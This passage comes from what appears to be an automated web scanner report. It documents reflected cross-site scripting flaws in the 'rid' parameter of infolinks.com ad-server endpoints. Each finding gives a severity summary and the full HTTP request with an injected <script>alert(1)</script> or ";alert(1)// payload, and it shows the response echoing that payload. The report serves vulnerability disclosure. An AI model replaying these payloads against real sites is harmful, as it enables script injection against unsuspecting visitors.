0date%20in%20nyc%7Cfrom%20popsugar%7Cnews%7Cphotos%7Cvideos%7Cceleb%20couples%7Cceleb%20kids%7Ctv%7Cmovies%7Cmusic%7Cfashion%20%26%20beauty%7C2011%20emmys%7Csign%20up%7Csign%20in&rid=d1ea2b56%2D5fdd%2D49db%2D8dab%2D4fcf1e95e552b1512<script>alert(1)</script>2de489fe3894dc8d1&ms=1305 HTTP/1.1
Host: rt1701.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
Origin: http://www.toofab.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec%00121ef; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:12:48 GMT; Path=/
Set-Cookie: cnoi=258; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:12:48 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 1306
Date: Sat, 17 Sep 2011 00:58:41 GMT

data=({rid:'d1ea2b56-5fdd-49db-8dab-4fcf1e95e552b1512<script>alert(1)</script>2de489fe3894dc8d1',fuid:'8d0d791e-8b09-4efc-b8c1-f2d069d5fcec%00121ef',sentences:{'partnership':{auth:{ssd:'PkMnsTjfyIrhXYNF9vlnZgY--3vq2ug0gob4E1WuHa2eL8cK_UxxycVfeWEI7zsCN8fGVi23yExEGUTZQmZ3x4-MUVdxtm2rQq2JaB6q8L-hM2
...[SNIP]...

4.164. http://rt1702.infolinks.com/action/doq.htm [rid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rt1702.infolinks.com
Path:   /action/doq.htm

Issue detail

The value of the rid request parameter is copied into the HTML document as plain text between tags. The payload f4b86<script>alert(1)</script>05405490f3695ed05 was submitted in the rid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /action/doq.htm?pcode=utf-8&r=1316239187592.1&by=f&jsv=222%2E0%2E4&plinks=news%7Cphotos%7Cvideos%7Cceleb%20couples%7Cceleb%20kids%7Ctv%7Cmovies%7Cmusic%7Cfashion%20%26%20beauty%7C2011%20emmys%7Csign%20up%7Csign%20in%7Cbritney%20spears%20wears%20ring%20amid%20engagement%20rumors%7C8%20comments%7Cashlee%20simpson%20hits%20red%20carpet%20with%20new%20man%7C2%20comments%7Chewitt%20holds%20hands%20with%20rumored%20bf%7Cwho%20is%20he%7C0%20comments%7Cread%20more%20%C2%BB%7C0%20comments%7Cclooney%27s%20ex%20elisabetta%20canalis%20strips%20for%20peta%7C0%20comments%7Cgeorge%20clooney%7Cfrom%20heartthrob%20to%20silver%20fox%7C0%20comments%7Cread%20more%20%C2%BB%7C1%20comment%7Cswoon%21%20ryan%20gosling%20holding%20a%20baby%7C0%20comments%7Cryan%20gosling%20goes%20bleach%20blonde%7Clike%20the%20look%7C0%20comments%7Cceleb%20couples%20news%7Creport%7Cthree%20ny%7Chousewives%7Cget%20the%20boot%7C188%20comments%7Cnew%7Ctwo%20and%20a%20half%20men%7Copener%7Cashton%7Csings%7Ctheme%21%7C74%20comments%7Cexclusive%7Cmelissa%20rivers%20splits%20with%20boyfriend%7C43%20comments%7Cjustin%20bieber%27s%20surprising%20views%20on%20marriage%7C38%20comments%7Csnooki%20gets%20inked%7Csee%20her%20new%20tattoo%7C28%20comments%7Cevening%20quickies%7Cjessica%20simpson%27s%20wedding%20possibly%20put%20off%7Cindefinitely%7Cscarlett%20johansson%27s%20nude%20pics%20inspire%20%23scarlettjohanssoning%7C12%20ways%20to%20impress%20joe%20manganiello%7Cnow%20that%20he%20is%20single%7Cfrom%20the%20frisky%7Clikes%20or%20yikes%7Cour%20favorite%20entertainment%20stories%20of%20the%20week%7Celisabeth%20moss%7Cso%20proud%7Cof%20new%20mom%20january%20jones%7Cx%20factor%7Ctrailer%7Clikes%20or%20yikes%7Cfrom%20ivillage%7Cbooboo%20%26%20fivel%20stewart%7Cabduction%7Cpremiere%21%7Cnicola%20peltz%20walks%20the%7Cboardwalk%20empire%7Chonor%20society%7Ca%20tale%20of%20risky%20business%7Cpt%7C2%7Ccover%20art%21%7Cfrom%20just%20jared%20jr%7C50%20cent%20wants%20to%20achieve%20hunger%20relief%20goal%20in%20two%2Dand%2Da%2Dhalf%20years%7Cjoss%20stone%20fostering%20a%20dog%7Cnick%20cannon%20doesn%27t%20want%20kids%20in%20show%20business%7Cfrom%20young%20hollywood%7Cmartha%20marcy%20may%20marlene%7Ccrazy%20title%7Ccrazy%2Dlooking%20movie%7Cvideo%7Cemmys%202011%20preview%7C10%20reasons%20to%20watch%20the%20awards%7Cglee%7Cpremiere%20spoilers%7Cwhat%20to%20expect%20in%20the%20first%20show%7Cfrom%20the%20stir%7Cnatalie%20portman%20fawns%20over%20adorable%20baby%20aleph%20and%20shares%20a%20loving%20stroll%20with%20benjamin%20in%20switzerland%21%7Cjames%20marsden%20always%20wanted%20kate%20bosworth%20to%20play%20his%20straw%20dogs%20wife%7Cjennifer%20aniston%20and%20justin%20theroux%20share%20a%20sweet%20lunch%20date%20in%20nyc%7Cfrom%20popsugar%7Cnews%7Cphotos%7Cvideos%7Cceleb%20couples%7Cceleb%20kids%7Ctv%7Cmovies%7Cmusic%7Cfashion%20%26%20beauty%7C2011%20emmys%7Csign%20up%7Csign%20in&crtw=0&wsid=1&twnum=67&crtss=30&ptxt=celeb%7Ccouples%7Cphotos%7Cgeorge%20clooney%20is%20widely%20regarded%20as%20hollywood%E2%80%99s%20most%20infamous%20bachelor%7Cclooney%20has%20recently%20romanced%20with%20former%E2%80%A6%7Cphotos%7Clooks%20like%20two%20more%20of%20hollywood%27s%20hottest%20bachelors%20may%20be%20off%20the%20market%7Cand%20their%20latest%20co%2Dstars%20are%20to%20blame%21%20ryan%E2%80%A6%7Cmost%7Cread%7C%C2%A9%202011%20ehm%20productions%7Cinc%7Call%20rights%20reserved%7Creproduction%20in%20whole%20or%20in%20part%20without%20permission%20is%20prohibited%7Cin%20partnership%20with%20tmz%7Ccom%7C&pimgs=toofab%7Clove%20it%7Clive%20it%7Cbritney%20spears%20wears%20ring%20amid%20engagement%20rumors%7Cashlee%20simpson%20hits%20red%20carpet%20with%20new%20man%7Chewitt%20holds%20hands%20with%20rumored%20bf%7Cwho%20is%20he%7Cclooney%27s%20ex%20elisabetta%20canalis%20strips%20for%20peta%7Cgeorge%20clooney%7Cfrom%20heartthrob%20to%20silver%20fox%7Cswoon%21%20ryan%20gosling%20holding%20a%20baby%7Cryan%20gosling%20goes%20bleach%20blonde%7Clike%20the%20look%7Creport%7Cthree%20ny%7Chousewives%7Cget%20the%20boot%7Cnew%7Ctwo%20and%20a%20half%20men%7Copener%7Cashton%7Csings%7Ctheme%21%7Cexclusive%7Cmelissa%20rivers%20splits%20with%20boyfriend%7Cjustin%20bieber%27s%20surprising%20views%20on%20marriage%7Csnooki%20gets%20inked%7Csee%20her%20new%20tattoo%7Ctoofab&crt=0&rts=1316239187593&csilv=4%2E0%2E60531%2E0&makey=41445a46475a4546475a4544425b454745424646454646444345455b69757171&rid=cca33222%2D1f55%2D4f3a%2Db220%2D79572031357ef4b86<script>alert(1)</script>05405490f3695ed05&phdrs=george%20clooney%27s%20many%20former%20flames%7Cryan%20gosling%20%26%20jake%20gyllenhaal%7Cdating%20their%20co%2Dstars%7C&purl=http%3A%2F%2Fwww%2Etoofab%2Ecom%2Fcategory%2Fceleb%2Dcouples%2F&pdesc=get%20the%20latest%20celebrity%20gossip%2Chollywood%20news%2Ccovering%20red%20carpet%20fashion%20and%20events%2Ccelebrity%20hairstyles%20and%20celebrity%20beauty%20buzz%20at%20toofab%21&page%5Fkeyw=hollywood%20news%2Cred%20carpet%20fashion%2Ccelebrity%20hairstyles%2Ccelebrity%20beauty%20buzz%2Ccelebrity%20gossip%2Cacademy%20awards%2Coscars%2Ccelebrity%20makeup%2Ccelebrity%20bikini%20bodies%2Ccelebrity%20style%2Ccelebrity%20dresses%2Ccelebrity%20jewelry%2Ccelebrity%20handbags&ref=www%2Etoofab%2Ecom%2Fnews%2F&ptitle=celeb%20couples%20%7C%20toofab%21&ms=1704&pid=159065 HTTP/1.1
Host: rt1702.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
Origin: http://www.toofab.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcecf0b8e; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:23:45 GMT; Path=/
Set-Cookie: cnoi=116; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:23:45 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 1588
Date: Sat, 17 Sep 2011 01:09:37 GMT
Connection: close

data=({rid:'cca33222-1f55-4f3a-b220-79572031357ef4b86<script>alert(1)</script>05405490f3695ed05',fuid:'8d0d791e-8b09-4efc-b8c1-f2d069d5fcecf0b8e',sentences:{'partnership':{auth:{ssd:'3l3pBOVRtR36fJ9wxxnZHIXATFLSFJC1cA3yOEGeWMYHUjoMvP14t1hdTqG7Wkj2KcdpXs28j91OrWVdilVS8JpX4SQ42RjAmTMKkc7urtR5t0Gmy
...[SNIP]...

4.165. http://rt1803.infolinks.com/action/doq.htm [rid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rt1803.infolinks.com
Path:   /action/doq.htm

Issue detail

The value of the rid request parameter is copied into the HTML document as plain text between tags. The payload 43a75<script>alert(1)</script>55b8e158a8c was submitted in the rid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /action/doq.htm?pcode=utf-8&r=1316238748131.1 HTTP/1.1
Host: rt1803.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
Content-Length: 11273
Origin: http://www.toofab.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded;charset=utf-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=0

makey=46435d41405d4241405d4243455c42404245414143444b40474b405c6971&phdrs=exclusive%7Cmelissa%20rivers%20splits%20with%20boyfriend%7Ccomments%7C43%7Cyour%20comment%7Creply%20to%20comment%7Coriginal%20comment%7C&rid=456b3667%2Dd6af%2D420e%2Db04b%2D3efe353e8d3b43a75<script>alert(1)</script>55b8e158a8c&pdesc=%20melissa%20rivers%20has%20split%20with%20her%20boyfriend%20jason%20zimmerman%2Cwho%20was%20featured%20on%20her%20reality%20show%2Cjoan%20%26%20melissa%2Cjoan%20knows%20best%2Ca%20source%20clo
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec%00672ec; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:05:34 GMT; Path=/
Set-Cookie: cnoi=73; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:05:34 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 1888
Date: Sat, 17 Sep 2011 00:51:26 GMT
Connection: close

data=({rid:'456b3667-d6af-420e-b04b-3efe353e8d3b43a75<script>alert(1)</script>55b8e158a8c',fuid:'8d0d791e-8b09-4efc-b8c1-f2d069d5fcec%00672ec',sentences:{'college':{auth:{ssd:'CZdQNQgD1x0w6qUXm2Dh_e_g7bSy81m5bfd1i7Zxv0nUEkGiuf0_am9IbtHA_6HbfaZobq7QtkE4HAcXhk7DoxOwc18DBtstlNi9WxJ5s7ps2MaOPW
...[SNIP]...

4.166. http://rt1804.infolinks.com/action/doq.htm [rid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rt1804.infolinks.com
Path:   /action/doq.htm

Issue detail

The value of the rid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59d76"%3balert(1)//1a6ef8a705cc240a7 was submitted in the rid parameter. This input was echoed as 59d76";alert(1)//1a6ef8a705cc240a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /action/doq.htm?pcode=utf-8&r=1316239196124.1&pid=159065&wsid=1&ptxt=photos%7Cit%27s+official%7Cashlee+simpson%7Cvincent+piazza%7Chave+gone+public%7Cwhile+the+two+have+already+been+spotted%7Con+the+sidewalks+of+new+york%7Cashlee+stepped+out+on+the+red+carpet+with+her+new+boyfriend+for+the+first+time+thursday+night%7Cthe+two+made+their+debut+as+a+couple+at+the+season+2+premiere+of%7Cboardwalk+empire%7Cwhich+vincent+stars+on%7Cwhere+she+looked+adorable+with+her+blonde+bob+and+a+purple+dress+with+gold+embellishments%7Cvincent+wasn%27t+the+only+dapper+dude+at+the+event%7Cwhere%7Cmark+wahlberg%7Cthomas+jane%7Cmichael+pitt%7Csteve+buscemi%7Cjack+huston%7Clooked+sharp+in+suits%7Ckelly+macdonald%7Ckelly+calrson%7Cgretchen+mol%7Cand+a+voluptuous%7Cpaz+de+la+huerta%7Crepresented+for+the+ladies%7Ccheck+out+all+the+red+carpet+photos+above%21%7Cpublished+09%7C15%7C11%7C11+hours+ago%7Cashlee+is+just+as+pretty+as+jessica%7Ci+never+thought+so+until+recently%7Chttp%7C%2F%2Felovehate%7Ccom%2Ftopics%2Fpeople%2Ftvpersonalities%2Frealitytvpersonalities%2Fashleesimpson%7Clikes%7Cdislikes%7C9+hours+ago%7Cit%27s+nomal%7Cshe+is+a+girl%7Cmy+site%7Chttp%7C%2F%2Ftimvanphong%7Cvn%7Clikes%7Cdislikes%7Cfirst+time+commenter%7Ca+confirmation+email+will+be+sent+to+you+after+you+post+your+comment%7Cmembers+enter+your+username+and+password%7Cplease+check+your+inbox%7Cyour+comment+will+not+appear+until+you+have+confirmed+your+identity+via+email%7Cplease+keep+your+comments+relevant+to+this+blog+entry%7Cemail+addresses+are+never+displayed%7Cbut+they+are+required+to+confirm+your+comments%7Cwhen+you+enter+your+name+and+email+address%7Cyou%27ll+be+sent+a+link+to+confirm+your+comment%7Cand+a+password%7Cto+leave+another+comment%7Cjust+use+that+password%7Cto+create+a+live+link%7Csimply+type+the+url%7Cincluding+http%7C%2F%2F%7Cor+email+address+and+we+will+make+it+a+live+link+for+you%7Cyou+can+put+up+to+3+urls+in+your+comments%7Cline+breaks+and+paragraphs+are+automatically+converted+%E2%80%94+no+need+to+use%7Cp%7Cor%7Cbr+%2F%7Ctags%7Ctoofab+has+upgraded+the+comments+system%7Cplease+re-register+to+comment%7Cmost%7Cread%7C%C2%A9+2011+ehm+productions%7Cinc%7Call+rights+reserved%7Creproduction+in+whole+or+in+part+without+permission+is+prohibited%7Cin+partnership+with+tmz%7Ccom%7C&page_keyw=ashlee+simpson%2Cvincent+piazza%2Cpete+wentz%2Cbronx+mowgli%2Cboardwalk+empire&pdesc=it%27s+official+%7C+ashlee+simpson+and+vincent+piazza+have+gone+public%2Cwhile+the+two+have+already+been+spotted+sharing+some+pda+on+the+sidewalks+of+new%E2%80%A6&plinks=news%7Cphotos%7Cvideos%7Cceleb+couples%7Cceleb+kids%7Ctv%7Cmovies%7Cmusic%7Cfashion+%26+beauty%7C2011+emmys%7Csign+up%7Csign+in%7Chewitt+holds+hands+with+rumored+bf%7Cwho+is+he%7C0+comments%7Creply%7Cclear+vote%7Creply%7Cclear+vote%7Cforgot+your+password%7Ccancel+reply%7Cadd+comment+%C2%BB%7Creport%7Cthree+ny%7Chousewives%7Cget+the+boot%7C188+comments%7Cnew%7Ctwo+and+a+half+men%7Copener%7Cashton%7Csings%7Ctheme%21%7C74+comments%7Cexclusive%7Cmelissa+rivers+splits+with+boyfriend%7C43+comments%7Cjustin+bieber%27s+surprising+views+on+marriage%7C38+comments%7Csnooki+gets+inked%7Csee+her+new+tattoo%7C28+comments%7Cevening+quickies%7Cjessica+simpson%27s+wedding+possibly+put+off%7Cindefinitely%7Cscarlett+johansson%27s+nude+pics+inspire+%23scarlettjohanssoning%7C12+ways+to+impress+joe+manganiello%7Cnow+that+he+is+single%7Cfrom+the+frisky%7Clikes+or+yikes%7Cour+favorite+entertainment+stories+of+the+week%7Celisabeth+moss%7Cso+proud%7Cof+new+mom+january+jones%7Cx+factor%7Ctrailer%7Clikes+or+yikes%7Cfrom+ivillage%7Cbooboo+%26+fivel+stewart%7Cabduction%7Cpremiere%21%7Cnicola+peltz+walks+the%7Cboardwalk+empire%7Chonor+society%7Ca+tale+of+risky+business%7Cpt%7C2%7Ccover+art%21%7Cfrom+just+jared+jr%7C50+cent+wants+to+achieve+hunger+relief+goal+in+two-and-a-half+years%7Cjoss+stone+fostering+a+dog%7Cnick+cannon+doesn%27t+want+kids+in+show+business%7Cfrom+young+hollywood%7Cmartha+marcy+may+marlene%7Ccrazy+title%7Ccrazy-looking+movie%7Cvideo%7Cemmys+2011+preview%7C10+reasons+to+watch+the+awards%7Cglee%7Cpremiere+spoilers%7Cwhat+to+expect+in+the+first+show%7Cfrom+the+stir%7Cnatalie+portman+fawns+over+adorable+baby+aleph+and+shares+a+loving+stroll+with+benjamin+in+switzerland%21%7Cjames+marsden+always+wanted+kate+bosworth+to+play+his+straw+dogs+wife%7Cjennifer+aniston+and+justin+theroux+share+a+sweet+lunch+date+in+nyc%7Cfrom+popsugar%7Cnews%7Cphotos%7Cvideos%7Cceleb+couples%7Cceleb+kids%7Ctv%7Cmovies%7Cmusic%7Cfashion+%26+beauty%7C2011+emmys%7Csign+up%7Csign+in&pimgs=toofab%7Clove+it%7Clive+it%7Chewitt+holds+hands+with+rumored+bf%7Cwho+is+he%7C0916_ashlee_launch%7Cno+avatar%7Ccommenter%27s+avatar%7Creport%7Cthree+ny%7Chousewives%7Cget+the+boot%7Cnew%7Ctwo+and+a+half+men%7Copener%7Cashton%7Csings%7Ctheme%21%7Cexclusive%7Cmelissa+rivers+splits+with+boyfriend%7Cjustin+bieber%27s+surprising+views+on+marriage%7Csnooki+gets+inked%7Csee+her+new+tattoo%7Ctoofab&phdrs=ashlee+simpson+hits+red+carpet+with+new+man%7Ccomments%7C2%7Cyour+comment%7Creply+to+comment%7Coriginal+comment%7C&makey=4a4f514d4c514e4d4c514e4f49504e4c4e494d4d4e4d4d474c474e50697277&purl=http%3A%2F%2Fwww.toofab.com%2F2011%2F09%2F15%2Fashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos%2F&ptitle=Ashlee+Simpson+Hits+Red+Carpet+with+New+Man+%7C+tooFab.com&jsv=221.3.5b&twnum=342&rts=1316239196125&rid=a7ad3562-1372-4dfd-befa-91c031751d4859d76"%3balert(1)//1a6ef8a705cc240a7&ref=www.toofab.com%2Fcategory%2Fceleb-couples%2F&by=i&crt=0&crtw=0&crtss=30&csilv=4.0.60531.0&ms=1704 HTTP/1.1
Host: rt1804.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/
Cache-Control: max-age=0
Origin: http://www.toofab.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=6

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcecf0b8e; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:23:53 GMT; Path=/
Set-Cookie: cnoi=151; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:23:53 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 1922
Date: Sat, 17 Sep 2011 01:09:45 GMT
Connection: close

<script type="text/javascript">var data="({rid:'a7ad3562-1372-4dfd-befa-91c031751d4859d76";alert(1)//1a6ef8a705cc240a7',fuid:'8d0d791e-8b09-4efc-b8c1-f2d069d5fcecf0b8e',sentences:{'official':{auth:{ssd:'itaNGDrSUBfIYHB37tX_u8XkpjWEhWA4oiG07bTLTRq3uRr1Rp-2CwGr_cfo8HJ_Ud8z8aYX2PREA25HQZ--wEo_TqnA5XpkFVsuHdyq_9UfpEyLiCpl
...[SNIP]...

4.167. http://rt1901.infolinks.com/action/doq.htm [rid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rt1901.infolinks.com
Path:   /action/doq.htm

Issue detail

The value of the rid request parameter is copied into the HTML document as plain text between tags. The payload 4c805<script>alert(1)</script>f2688bb913f8c893f was submitted in the rid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /action/doq.htm?pcode=utf-8&r=1316238723239.1&twnum=160&page%5Fkeyw=hollywood%20news%2Cred%20carpet%20fashion%2Ccelebrity%20hairstyles%2Ccelebrity%20beauty%20buzz%2Ccelebrity%20gossip%2Cacademy%20awards%2Coscars%2Ccelebrity%20makeup%2Ccelebrity%20bikini%20bodies%2Ccelebrity%20style%2Ccelebrity%20dresses%2Ccelebrity%20jewelry%2Ccelebrity%20handbags&phdrs=2011%20emmy%20awards%7Cwho%20should%20win%7Ckristin%20cavallari%20defends%20chaz%20bono%7Cleave%20him%20alone%21%7Cmoms%20on%20set%7Chow%20do%20they%20do%20it%7Ctoofabtweets&crtss=30&pid=159065&plinks=news%7Cphotos%7Cvideos%7Cceleb%20couples%7Cceleb%20kids%7Ctv%7Cmovies%7Cmusic%7Cfashion%20%26%20beauty%7C2011%20emmys%7Csign%20up%7Csign%20in%7Cthis%20week%27s%20hottest%20pics%7Cbabies%7Cboobs%20%26%20beyonce%21%7C1%20comment%7Ctoddlers%20%26%20tiaras%7Cstar%20goes%20wild%20on%20live%20tv%7C14%20comments%7Cexclusive%7Cmelissa%20rivers%20splits%20with%20boyfriend%7C43%20comments%7Ctaylor%20lautner%20shows%20stubble%20at%7Cabduction%7Cpremiere%7C3%20comments%7Csnooki%20slams%20into%20italian%20cop%7Cwatch%20the%20accident%21%7Cjill%20zarin%7Cno%20pink%20slip%20for%7Creal%20housewives%7Cvictoria%20beckham%20%26%20baby%20harper%27s%20shopping%20spree%7Cbritney%20spears%20wears%20ring%20amid%20engagement%20rumors%7Chot%20shots%7Cseptember%2016%7C2011%7C2%20comments%7Ctoday%27s%20celebrity%20birthdays%7C0%20comments%7Cwin%20a%20hex%20iphone%20wallet%21%7C5%20comments%7Cread%20more%20%C2%BB%7C0%20comments%7Cworst%20dressed%20stars%20of%20emmys%7Cpast%7C0%20comments%7Cbest%20dressed%20stars%20of%20emmys%7Cpast%7C0%20comments%7Cread%20more%20%C2%BB%7C0%20comments%7Cchmerkovskiy%20brothers%20face%2Doff%20for%20the%20first%20time%21%7C0%20comments%7Cdancing%20with%20the%20stars%7Cofficial%20cast%20shots%21%7C0%20comments%7Crt%20%40misskellyo%7C%40mileycyrus%7C%40khloekardashian%7C9%20hours%20ago%7Cread%20more%20%C2%BB%7C0%20comments%7Csarah%20jessica%20parker%27s%20many%20premiere%20looks%7C0%20comments%7Cchristina%20hendricks%20steals%20sjp%27s%20spotlight%20at%20premiere%7C0%20comments%7Creport%7Cthree%20ny%7Chousewives%7Cget%20the%20boot%7C188%20comments%7Cnew%7Ctwo%20and%20a%20half%20men%7Copener%7Cashton%7Csings%7Ctheme%21%7C74%20comments%7Cexclusive%7Cmelissa%20rivers%20splits%20with%20boyfriend%7C43%20comments%7Cjustin%20bieber%27s%20surprising%20views%20on%20marriage%7C38%20comments%7Csnooki%20gets%20inked%7Csee%20her%20new%20tattoo%7C28%20comments%7Cevening%20quickies%7Cjessica%20simpson%27s%20wedding%20possibly%20put%20off%7Cindefinitely%7Cscarlett%20johansson%27s%20nude%20pics%20inspire%20%23scarlettjohanssoning%7C12%20ways%20to%20impress%20joe%20manganiello%7Cnow%20that%20he%20is%20single%7Cfrom%20the%20frisky%7Clikes%20or%20yikes%7Cour%20favorite%20entertainment%20stories%20of%20the%20week%7Celisabeth%20moss%7Cso%20proud%7Cof%20new%20mom%20january%20jones%7Cx%20factor%7Ctrailer%7Clikes%20or%20yikes%7Cfrom%20ivillage%7Cbooboo%20%26%20fivel%20stewart%7Cabduction%7Cpremiere%21%7Cnicola%20peltz%20walks%20the%7Cboardwalk%20empire%7Chonor%20society%7Ca%20tale%20of%20risky%20business%7Cpt%7C2%7Ccover%20art%21%7Cfrom%20just%20jared%20jr%7C50%20cent%20wants%20to%20achieve%20hunger%20relief%20goal%20in%20two%2Dand%2Da%2Dhalf%20years%7Cjoss%20stone%20fostering%20a%20dog%7Cnick%20cannon%20doesn%27t%20want%20kids%20in%20show%20business%7Cfrom%20young%20hollywood%7Cmartha%20marcy%20may%20marlene%7Ccrazy%20title%7Ccrazy%2Dlooking%20movie%7Cvideo%7Cemmys%202011%20preview%7C10%20reasons%20to%20watch%20the%20awards%7Cglee%7Cpremiere%20spoilers%7Cwhat%20to%20expect%20in%20the%20first%20show%7Cfrom%20the%20stir%7Cnatalie%20portman%20fawns%20over%20adorable%20baby%20aleph%20and%20shares%20a%20loving%20stroll%20with%20benjamin%20in%20switzerland%21%7Cjames%20marsden%20always%20wanted%20kate%20bosworth%20to%20play%20his%20straw%20dogs%20wife%7Cjennifer%20aniston%20and%20justin%20theroux%20share%20a%20sweet%20lunch%20date%20in%20nyc%7Cfrom%20popsugar%7Cnews%7Cphotos%7Cvideos%7Cceleb%20couples%7Cceleb%20kids%7Ctv%7Cmovies%7Cmusic%7Cfashion%20%26%20beauty%7C2011%20emmys%7Csign%20up%7Csign%20in&rts=1316238723241&ms=1305&makey=4a4f514d4c514e4d4c514e4f49504e4c4e494d4d4f484a4749494f5069707374&csilv=4%2E0%2E60531%2E0&crt=0&jsv=222%2E0%2E4&rid=7fbf5229%2D56c4%2D45d9%2D9756%2D4d0d190b02834c805<script>alert(1)</script>f2688bb913f8c893f&ptxt=must%7Cfor%20full%20coverage%20of%20the%202011%20emmy%20awards%21%7Csep%2016%7C2011%205%7C50%20pm%7C8%20hours%20ago%7C11%20hours%20ago%7C12%20hours%20ago%7C7%20hours%20ago%7C2011%7Cemmys%7Cthe%202011%20emmy%20awards%20go%20down%20this%20weekend%20in%20l%7Ca%7Cand%20we%20want%20to%20know%20which%20tv%20shows%20and%20stars%20you%27re%20rooting%20for%20to%20go%E2%80%A6%7Cphoto%20credit%7Cabc%7Cpoll%7Cwith%20season%2013%20of%20%E2%80%9Cdancing%20with%20the%20stars%E2%80%9D%20around%20the%20corner%7Cthere%20is%20no%20doubt%20that%20most%20of%20the%20discussion%20has%E2%80%A6%7Cphoto%20credit%7Cabc%7Ctwitter%7Chad%20the%20best%20girls%20night%20w%2F%7Clets%20just%20say%20it%20was%20not%20what%20i%20was%20expecting%20%26%20i%27v%20never%20laughed%20so%20hard%20before%21%7Cmovies%7Csarah%20jessica%20parker%27s%20new%20comedy%7Ci%20don%27t%20know%20how%20she%20does%20it%7Copens%20in%20theaters%20friday%7Cin%20the%20film%7Cparker%20plays%20a%E2%80%A6%7Cphoto%20credit%7Csplashnewsonline%7Ccom%7Cmost%7Cread%7C%C2%A9%202011%20ehm%20productions%7Cinc%7Call%20rights%